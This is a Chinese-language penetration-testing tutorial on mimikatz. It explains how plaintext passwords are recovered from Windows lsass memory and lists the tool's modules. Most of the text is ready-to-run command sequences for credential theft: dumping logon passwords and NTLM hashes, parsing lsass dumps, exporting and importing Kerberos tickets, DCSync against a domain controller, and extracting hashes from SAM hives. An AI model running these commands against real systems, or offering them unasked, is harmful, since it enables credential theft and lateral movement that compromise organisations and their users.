內網滲透中mimikatz使用方法

Mimikatz簡介

Mimikatz 是一款功能強大的輕量級調試神器，通過它你可以提升進程權限注入進程讀取進程內存，當然他最大的亮點就是他可以直接從 lsass.exe進程中獲取當前登錄系統用戶名的密碼， lsass是微軟Windows系統的安全機制它主要用於本地安全和登陸策略，通常我們在登陸系統時輸入密碼之后，密碼便會儲存在 lsass內存中，經過其 wdigest 和 tspkg 兩個模塊調用后，對其使用可逆的算法進行加密並存儲在內存之中， 而 mimikatz 正是通過對lsass逆算獲取到明文密碼！也就是說只要你不重啟電腦，就可以通過他獲取到登陸密碼，只限當前登陸系統！

Mimikatz命令使用

cls：清屏
standard：標准模塊，基本命令
crypto：加密相關模塊
sekurlsa：與證書相關的模塊
kerberos：kerberos模塊
privilege：提權相關模塊
process：進程相關模塊
serivce：服務相關模塊
lsadump：LsaDump模塊
ts：終端服務器模塊
event：事件模塊
misc：雜項模塊
token：令牌操作模塊
vault：Windows 、證書模塊
minesweeper：Mine Sweeper模塊
dpapi：DPAPI模塊（通過API或RAW訪問）[數據保護應用程序編程接口]
busylight：BusyLight Module
sysenv：系統環境值模塊
sid：安全標識符模塊
iis：IIS XML配置模塊
rpc：mimikatz的RPC控制
sr98：用於SR98設備和T5577目標的RF模塊
rdm：RDM（830AL）器件的射頻模塊
acr：ACR模塊
version：查看版本
exit：退出

Mimikatz常用命令

cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看當前登錄的系統用戶
system::computer-------查看計算機名稱
process::list------------------列出進程
process::suspend 進程名稱 -----暫停進程
process::stop 進程名稱---------結束進程
process::modules --列出系統的核心模塊及所在位置
service::list---------------列出系統的服務
service::remove-----------移除系統的服務
service::start stop 服務名稱--啟動或停止服務
privilege::list---------------列出權限列表
privilege::enable--------激活一個或多個權限
privilege::debug-----------------提升權限
nogpo::cmd------------打開系統的cmd.exe
nogpo::regedit -----------打開系統的注冊表
nogpo::taskmgr-------------打開任務管理器
ts::sessions-----------------顯示當前的會話
ts::processes------顯示進程和對應的pid情況等
sekurlsa::wdigest-----獲取本地用戶信息及密碼
sekurlsa::tspkg------獲取tspkg用戶信息及密碼
sekurlsa::logonPasswords--獲登陸用戶信息及密碼

 

Mimikatz使用前准備

mimikatz # log
mimikatz # privilege::debug   //提升權限（不是administrator，debug會失敗）

Mimikatz抓取明文密碼

mimikatz #log
mimikatz #privilege::debug
mimikatz #sekurlsa::logonpasswords

注：但是在安裝了KB2871997補丁或者系統版本大於windows server 2012時，系統的內存中就不再保存明文的密碼，這樣利用mimikatz就不能從內存中讀出明文密碼了。mimikatz的使用需要administrator用戶執行，administrators中的其他用戶都不行，所以我們這里用administrator權限啟動mimikatz。

msv：是賬戶對於的密碼的各種加密協議的密文，這里有LM、NTLM和SHA1加密的密文
tspkg,wdigest,kerberos：是賬戶的明文密碼了。（這里顯示為null，是應為版本大於2012）
SSP：是最新登陸到其他RDP終端的賬戶和密碼

Mimikatz模塊使用

sekurlsa模塊

sekurlsa::logonpasswords  //獲取登錄用戶信息及密碼

抓取用戶NTLM哈希
sekurlsa::msv

加載dmp文件，並導出其中的明文密碼
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

導出lsass.exe進程中所有的票據
sekurlsa::tickets /export

kerberos模塊

列出系統中的票據
kerberos::list
kerberos::tgt

清除系統中的票據
kerberos::purge

導入票據到系統中
kerberos::ptc 票據路徑

lsadump模塊      

在域控上執行)查看域kevin.com內指定用戶root的詳細信息，包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root

(在域控上執行)讀取所有域用戶的哈希
lsadump::lsa /patch

從sam.hive和system.hive文件中獲得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive

從本地SAM文件中讀取密碼哈希
token::elevate
lsadump::sam